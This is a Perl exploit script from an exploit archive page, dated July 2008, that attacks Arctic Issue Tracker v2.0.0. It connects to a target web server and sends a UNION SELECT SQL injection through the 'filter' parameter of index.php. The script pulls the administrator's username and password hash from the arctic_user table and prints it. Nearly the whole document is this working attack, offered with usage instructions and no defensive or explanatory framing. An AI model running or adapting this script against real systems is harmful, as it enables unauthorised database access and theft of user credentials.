Home / exploits arctic-sql.txt
Posted on 22 July 2008
#!/usr/bin/perl use IO::Socket; print q{ ----------------------------------------------- Arctic Issue Tracker v2.0.0 exploit by ldma ~ SubCode ~ use: arctic.pl [server] [dir] sample: $perl arctic.pl localhost /arctic/ ----------------------------------------------- }; $webpage = $ARGV[0]; $directory = $ARGV[1]; print "+-initiating "; print "|--modules..OK! "; sleep 1; print "|--premodules..OK! "; sleep 1; print "|--preprocessors..OK! "; sleep 1; print "+-opening channel.. OK! "; sleep 2; print "-------------------------------------------- "; print "~ configuration complete.. OK! "; print "~ scanning"; $|=1; foreach (1..2) { print "."; sleep 1; } print " OK! "; if (!$webpage) { die "+ rtfm geek "; } $wbb_dir = "http://".$webpage.$directory."index.php?filter=-1%20union%20select%201,2,3,concat(username,0x3a,password),5%20from%20arctic_user%20where%20id=1--"; print "~ connecting"; $|=1; foreach (1..1) { print "."; sleep 1; } print " OK! "; $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$webpage", PeerPort=>"80") || die "[+] Can't connect to Server "; print "~ open exploiting-tree"; $|=1; foreach (1..2) { print "."; sleep 1; } print " OK! "; print $sock "GET $wbb_dir HTTP/1.1 "; print $sock "Accept: */* "; print $sock "User-Agent: Hacker "; print $sock "Host: $webpage "; print $sock "Connection: close "; print "[+] Target: $webpage "; while ($answer = <$sock>) { if ($answer =~ /Current Filter: <strong>(.*)</strong>/) { print "exploiting in progress"; $|=1; foreach (1..3) { print "..."; sleep 1; } print "OK! [+] vuln: OK! well done, ldma! "; print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "; print "[+] USER-ID: -1 "; print "[+] ID-HASH: $1 "; print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "; exit(); } } close($sock); # ldma[2008-07-19]
